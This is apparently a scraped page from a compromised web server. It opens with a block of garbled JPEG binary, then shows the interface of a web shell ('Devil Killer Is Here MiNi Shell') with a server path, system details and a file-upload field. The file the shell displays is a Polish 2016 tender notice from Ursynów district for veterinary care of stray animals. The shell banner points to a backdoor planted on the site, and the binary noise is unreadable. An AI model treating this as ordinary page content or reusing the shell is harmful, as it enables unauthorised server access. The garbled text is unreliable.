JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161216/368991-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www. ursynow.pl' target='_blank'>http://www. ursynow.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 368991 - 2016
              z dnia 2016-12-16 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Warszawa: Świadczenie usług weterynaryjnych dla bezdomnych zwierząt z terenu Dzielnicy Ursynów m.st. Warszawy w 2017 roku<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Miasto Stołeczne Warszawa Dzielnica Ursynów, krajowy numer identyfikacyjny
              1525964000000, ul.
              al. Komisji Edukacji Narodowej 
              61,
              02777  
              Warszawa, woj.
              mazowieckie, państwo
              Polska, tel.
              22 443 71 01, e-mail
              zam_publ@ursynow.pl, faks
              22 443 71 02.
              <br />
              Adres strony internetowej (URL): www.ursynow.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.ursynow.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www. ursynow.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Ofertę należy przesłać na adres Zamawiającego wskazany w pkt. 3.4 SIWZ lub złożyć w siedzibie Zamawiającego przy Al. KEN 61 w Wydziale Obsługi Mieszkańców na parterze, stanowiska 2 lub 3<br />
                Adres:
                <br /> Adres:  Al. KEN 61, 02-777 Warszawa</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Świadczenie usług weterynaryjnych dla bezdomnych zwierząt z terenu Dzielnicy Ursynów m.st. Warszawy w 2017 roku<br /><b>Numer referencyjny: </b>KZP-XII-WZP.271.85.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem niniejszego zamówienia jest świadczenie usług weterynaryjnych dla bezdomnych zwierząt z terenu Dzielnicy Ursynów m.st. Warszawy w 2017 roku.

1. Założenia ogólne
Opieka weterynaryjna nad bezdomnymi psami i wolno żyjącymi kotami jest  jednym 
z elementów realizowanego w Dzielnicy Ursynów zadania z zakresu bezdomności zwierząt w mieście. Prawidłowa realizacja zadania wymaga właściwego podejścia wszystkich podmiotów uczestniczących w tym przedsięwzięciu do problematyki bezdomności zwierząt. 
Lecznica weterynaryjna, która podejmie się wykonywania zabiegów i leczenia zwierząt wolno żyjących musi być do tego odpowiednio przygotowana. Najważniejsze jest doświadczenie i umiejętność postępowania ze zwierzętami nie oswojonymi, przewidywanie reakcji zwierząt znajdujących się w stresie. Jednakże istotny jest nie tylko prawidłowy stosunek do zwierząt, ale także wyrozumiałość i życzliwe podejście do ich społecznych opiekunów np. do osób karmiących koty wolno żyjące. Osoby te mają prawo do pełnej informacji o stanie zdrowia swoich podopiecznych oraz o wykonanych przez lecznicę zabiegach. Wobec powyższego każde zwierzę przyjęte do lecznicy musi mieć założoną kartę pacjenta (kartę zdrowia), w której odnotowane są wszystkie wykonane zabiegi, podane leki itd. Na życzenie opiekuna informacje te muszą być mu udostępnione.

2. Wymagania ogólne
2.1. Wykonawca musi przyjmować zwierzęta i wykonywać usługi objęte zamówieniem w zakładzie leczniczym/zakładach leczniczych dla zwierząt w rozumieniu ustawy z dnia 18 grudnia 2003 r. o zakładach leczniczych dla zwierząt  (Dz.U. z dnia 27 stycznia 2004 r., Nr 11 poz.95 z późn.zm.).
2.2. Zakład leczniczy/zakłady lecznicze przyjmujący/e zwierzęta objęte opieką weterynaryjną musi/muszą znajdować się na terenie Dzielnicy Ursynów m.st. Warszawy lub w dzielnicy sąsiedniej z dobrym połączeniem komunikacyjnym. Przez "dobre połączenie komunikacyjne" Zamawiający rozumie dojazd jednym środkiem komunikacji miejskiej od ostatniego przystanku położonego na terenie dzielnicy Ursynów do przystanku położonego w odległości nieprzekraczającej 500 m od całodobowego zakładu leczniczego (odległość wyznaczona w linii prostej), w czasie nieprzekraczającym 15 minut (maksymalny czas przejazdu ustalony na podstawie rozkładu jazdy ZTM).
2.3. Usługi wynikające z realizacji przedmiotu zamówienia muszą być wykonywane 
w zakładzie leczniczym/zakładach leczniczych w wymiarze całodobowym, 
a Wykonawca musi zapewnić 24-godzinną (również w dni świąteczne) opiekę weterynaryjną oraz zagwarantować przyjmowanie i wydawanie zwierząt opiekunom przez całą dobę.
2.4. Zakład leczniczy/zakłady lecznicze musi/muszą (każdy z nich) posiadać pomieszczenie (tzw. szpitalik) przystosowane do okresowego przetrzymywania zwierząt chorych lub oczekujących na zabiegi, wyposażone w boksy, klatki, klipery itp. - na minimum 10 zwierząt (w tym dwie klatki o wymiarach minimum 95x65x75 cm przeznaczone dla psów oraz 8 klatek o wymiarach minimum 65x50x45, przeznaczonych dla kotów) tak, aby nie zdarzyło się odmówienie przyjęcia zwierzęcia, z powodu braku miejsca w pomieszczeniu (tzw. szpitaliku). Ponadto zakład leczniczy/zakłady lecznicze muszą posiadać wydzieloną izolatkę/szpital zakaźny.
2.5. Wykonawca musi dysponować aparaturą i sprzętem dostosowanym do zakresu świadczonych usług.
2.6. Wykonawca musi zapewnić wyjazdy do wypadków, w których poszkodowane są zwierzęta.
2.7. Wykonawca musi dysponować urządzeniem chłodniczym do przechowywania zwłok.
2.8. Wykonawca musi posiadać umowę na odbiór opadów pochodzenia zwierzęcego z każdego z zakładów leczniczych w których świadczona będzie usługa weterynaryjna stanowiąca przedmiot niniejszego zamówienia. 
2.9. Wykonawca musi prowadzić dokumentację lekarską wykonywanych usług (ze szczególnym uwzględnieniem przypadków eutanazji), dokonywać szczegółowych wpisów zastosowanych zabiegów i leczenia do kart pacjenta (kart zdrowia). Zwierzę przyjmowane do zakładu leczniczego musi mieć nadany kolejny numer, a w karcie leczenia powinna też być adnotacja zawierająca:
	datę i godzinę przyjęcia zwierzęcia,
	dane osoby (np. numer patrolu EKO lub przedstawiciela organizacji pozarządowej lub imię i nazwisko oraz numer telefonu osoby dostarczającej zwierzę (osoby prywatne),
	miejsce, z którego zostało ono przywiezione (w miarę możliwości - nazwę i numer ulicy, gdzie zostało znalezione/odłowione lub opis tego miejsca). 
Standardem powinno być sprawdzenie czy zwierzę nie jest oznakowane elektronicznie. 
Przy wydawaniu zwierzęcia należy odnotować, komu zostało ono wydane i w jakim celu (np. adopcja, wypuszczenie na wolność, przekazanie pod opiekę). 
Na zabiegi planowane i leczenie  skierowanie opiekunowi zwierzęcia wydaje Wydział Ochrony Środowiska. Opiekun uzgadnia termin wykonania zabiegu z Wykonawcą 
i w uzgodnionym terminie doprowadza zwierzę do zakładu. Długość terminu wykonania usługi nie może powodować zagrożenia pogorszenia stanu zdrowia zwierzęcia, a dla zabiegów chirurgicznych planowanych nie może być dłuższy niż 
7 dni.
Na zabiegi nie planowane, nie związane z wypadkami, ale konieczne do wykonania (np. sterylizacja/kastracja kotów wolno żyjących) skierowanie opiekunowi wydaje Wydział Ochrony Środowiska. W takich przypadkach lecznica/lecznice jest zobowiązana do przyjęcia wyłapanego przez opiekuna  zwierzęcia wolno żyjącego 
w chwili dostarczenia go do zakładu leczniczego.
Zabiegi nie planowane związane z wypadkami bądź nagłymi chorobami zwierząt, a w szczególności czynności mające na celu stabilizację stanu zwierzęcia 
i przywrócenie homeostazy organizmu muszą być wykonane niezwłocznie po ich zgłoszeniu i dostarczeniu zwierzęcia do zakładu leczniczego lub przywiezieniu z wypadku, tj. nie później niż do 1 godziny od zgłoszenia.
Wykonawca zobowiązany jest przyjąć do zakładu leczniczego/zakładów leczniczych każde zwierzę poszkodowane w wypadku bądź chore, dostarczone przez mieszkańców, Policję, Straż Miejską lub inne służby Miasta, udzielić mu niezbędnej pierwszej pomocy i w możliwie najkrótszym terminie uzgodnić telefonicznie dalsze postępowanie z właściwym pracownikiem Zamawiającego przed ich wykonaniem, chyba że są to zabiegi ratujące życie zwierząt.
W przypadku przyjęcia zwierząt bez skierowania z Wydziału Ochrony Środowiska, Wykonawca jest  zobowiązany do sporządzenia notatki opisującej okoliczności przyjęcia zwierzęcia, rodzaj obrażeń i zakres wykonanych zabiegów (zgodnie 
z wzorem stanowiącym załącznik nr 1 do niniejszego opisu przedmiotu zamówienia oraz równocześnie załącznik nr 1a do wzoru umowy). 
3. Zamówienie obejmuje wykonywanie usług weterynaryjnych wymienionych 
w Formularzu cenowym (załącznik nr 2 do SIWZ oraz równocześnie załącznik nr 2 do wzoru umowy). Podane w załączniku przewidywane ilości poszczególnych zabiegów w roku 2017 są ilościami orientacyjnymi i mogą ulec zmianie (zwiększeniu lub zmniejszeniu) w okresie wykonywania zamówienia  stosownie do rzeczywistych potrzeb w okresie obowiązywania umowy, przy czym łączna maksymalna wartość wszystkich rzeczywiście wykonanych usług weterynaryjnych nie przekroczy łącznej ceny ofertowej wybranego Wykonawcy, z którym zostanie podpisana umowa.

4. Procedura związana ze sterylizacją/kastracją zwierząt
4.1. Przeprowadzenie wywiadu lekarskiego z karmicielem.
4.2. Badanie zwierzęcia i kwalifikacja do zabiegu. Gdy jest chory musi być najpierw wyleczony.
4.3. Gdy zwierzę znajduje się w premedykacji należy sprawdzić stan oczu, zębów i uszu (świerzbowiec), w razie potrzeby oczyścić, usunąć kamień nazębny, ruchome zęby itp. W tym momencie można również koty odrobaczyć i odpchlić (o ile nie było to wykonane wcześniej). 
4.4. W trakcie zabiegu powłoka skórna powinna być zeszyta krytym szwem śródskórnym, przy użyciu szwów rozpuszczalnych, tak aby nie było konieczności ich usuwania. 
4.5. Po zabiegu zaleca się jednokrotne podanie antybiotyku o przedłużony działaniu oraz preparatu przeciwbólowego.
4.6. Zagwarantowanie pobytu zwierząt w zakładzie leczniczym (samice min. 5 dób, samce min. 3 doby). 
W przypadku kotów:
a) Po sterylizacji kotki pobyt w lecznicy może być dłuższy niż 5 dób ale wymaga to uzgodnienia z właściwym pracownikiem Zamawiającego. 
b) Na prośbę opiekuna koty mogą być wydane wcześniej, po ustabilizowaniu stanu zdrowia pacjenta. 
c) Pobyt kotów wolno żyjących w zakładzie leczniczym powinien być zapewniony do czasu zakończenia leczenia.

5. Usługi weterynaryjne dla psów
5.1. Zakres usług weterynaryjnych dla bezdomnych psów dotyczy tych psów, które trafiły do zakładu leczniczego z wypadku bądź chore, dostarczone przez mieszkańców, Policję, Straż Miejską lub inne służby Miasta i obejmuje zbadanie ogólnego stanu zdrowia, udzielenie niezbędnej pierwszej pomocy oraz wykonanie zabiegów ratujących życie. Następnie pies zostanie przewieziony przez Wykonawcę do Schroniska dla Zwierząt Na Paluchu lub do ursynowskiego przytuliska (w zależności od liczby wolnych miejsc w przytuliskach).
Transport zwierząt do Schroniska zapewnia Straż Miejska m.st. Warszawy lub Schronisko, po uprzednim zgłoszeniu potrzeby transportu przez Wykonawcę.
Wykonawca każdorazowo, uzgodni ze Schroniskiem konieczność i termin przyjęcia zwierzęcia, w celu zapewnienia miejsca w szpitalu Zgłoszenia można dokonać poprzez telefon, faks lub drogą elektroniczną:
	faks: 22/ 846-02-50;
	całodobowe numery telefonów: 22/846-02-36, 22/868-15-79, 604-777-747;
	e-mail: info@paluch.org.pl, ba02@paluch.org.pl; kier.bpia@paluch.org.pl 
W przypadku przeciwwskazań lekarskich do przewozu zwierzęcia, pozostanie ono 
w zakładzie leczniczym dla zwierząt do czasu ustabilizowania stanu, przy czym Wykonawca poinformuje Zamawiającego o zaistniałej sytuacji w możliwie najkrótszym czasie od przyjęcia zwierzęcia.
5.2. Stałą opieką weterynaryjną objętych będzie ok. 60 psów przebywających w ursynowskich przytuliskach. Zakres zabiegów i leczenie musi być uzgodnione telefonicznie z właściwym pracownikiem Zamawiającego przed ich wykonaniem, chyba że są to zabiegi ratujące życie zwierząt.
5.3. Urząd Dzielnicy Ursynów zastrzega sobie prawo do odstąpienia od uporczywego leczenia i kontynuowania terapii w przypadku złego rokowania, potwierdzonego opinią lekarza weterynarii.

6. Inne wymogi w zakresie wykonania przedmiotu zamówienia
6.1. W maksymalnej cenie ofertowej, w tym w cenach jednostkowych zawartych 
w Formularzu cenowym (załącznik nr 2 do SIWZ oraz równocześnie załącznik nr 2 do wzoru umowy) muszą być zawarte całkowite koszty wykonania przedmiotowych usług, tj. koszt robocizny, zakupu niezbędnych materiałów i leków podawanych zwierzętom w zakładzie leczniczym oraz wydawanych opiekunom, pracy sprzętu, transportu oraz koszty pośrednie i zysk z uwzględnieniem wszystkich elementów cenotwórczych np. kosztów żywienia zwierząt przebywających w zakładzie leczniczym.
6.2. Testy w kierunku białaczki i syndromu niedoboru immunologicznego (FeLV i FIV) powinny być wykonywane wyłącznie u zwierząt podejrzewanych o nosicielstwo lub chorobę, wykazujących takie objawy kliniczne jak charłactwo, powiększone węzły chłonne, trudno leczące się, przewlekłe stany zapalne, czy inne uporczywe schorzenia itp. Każdorazowo decyzję o konieczności eutanazji zwierzęcia powinien podejmować lekarz weterynarii, zgodnie z przepisami i z etyką lekarską.
W przypadku kotów dostarczanych przez opiekunów przy uzyskaniu jednorazowego wyniku dodatniego (może on być fałszywie dodatni) lekarz powinien powiadomić o tym fakcie opiekuna kota i przedstawić ewentualne zagrożenia związane z tymi chorobami m.in. drogi zarażenia, ze względu na pozostałe zwierzęta, którymi zajmuje się opiekun. Decyzja o eutanazji zwierzęcia seropozytywnego powinna być poprzedzona kolejnym badaniem krwi (w odstępie 6 tygodni  o ile kot da się ponownie odłowić). 
6.3. Utrzymywanie stałego codziennego kontaktu telefonicznego z właściwymi pracownikami Zamawiającego z Wydziału Ochrony Środowiska dla Dzielnicy Ursynów, w tym udzielanie szczegółowych informacji o przyjętych i wydanych opiekunom zwierzętach.
6.4. Lecznica ma obowiązek utrzymywania kontaktu z opiekunami zwierząt 
i udzielania im pełnej, bieżącej informacji na temat stanu zdrowia pacjenta oraz o już przeprowadzonych i przewidywanych działaniach medycznych. Współpraca 
z opiekunami winna przebiegać harmonijnie i z poszanowaniem oczekiwań oraz emocji osób sprawujących opiekę nad zwierzętami bezdomnymi i w przypadku kotów - wolno żyjącymi.

Szczegółowy opis przedmiotu zamówienia określony został również w załączniku nr 1 do umowy oraz 
wzorze umowy stanowiącym załącznik nr 7 do SIWZ 
formularzu cenowym który stanowi o rodzajach zabiegów/leczenia, a także o maksymalnej planowanej liczbie zabiegów/leczenia w 2017 r. w odniesieniu do kotów/psów - załącznik nr 2 do SIWZ oraz równocześnie załącznik nr 2 do umowy. 
<br /><br /><b>II.5) Główny kod CPV: </b>85200000-1<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              194907.41<br />
              Waluta:
              <br /><div style="padding-left: 20px">PLN<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Za spełniających warunki udziału w postępowaniu Zamawiający uzna Wykonawców którzy wykażą, że:

1)Dysponują co najmniej jednym całodobowym zakładem leczniczym dla zwierząt na terenie Dzielnicy Ursynów lub na terenie dzielnicy sąsiadującej z dobrym połączeniem komunikacyjnym1, odpowiednio wyposażonym tj. zgodnie z ustawą z dnia 18 grudnia 2003 r. o zakładach leczniczych dla zwierząt (Dz. U. z 2015 r. poz. 1047 ze zm.) oraz Rozporządzeniami Ministra Rolnictwa i Rozwoju Wsi z dnia 16 sierpnia 2004 r. 
w sprawie wymagań dla gabinetów weterynaryjnych, 
w sprawie wymagań dla przychodni weterynaryjnych, 
w sprawie wymagań dla lecznic weterynaryjnych , 
w sprawie wymagań dla klinik weterynaryjnych 
umożliwiającym wykonanie usługi zgodnie z opisem przedmiotu zamówienia .

1Przez "dobre połączenie komunikacyjne" Zamawiający rozumie dojazd jednym środkiem komunikacji miejskiej od ostatniego przystanku położonego na terenie dzielnicy Ursynów do przystanku położonego w odległości nieprzekraczającej 500 m od całodobowego zakładu leczniczego (odległość wyznaczona w linii prostej), w czasie nieprzekraczającym 15 minut (maksymalny czas przejazdu ustalony na podstawie rozkładu jazdy ZTM).<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
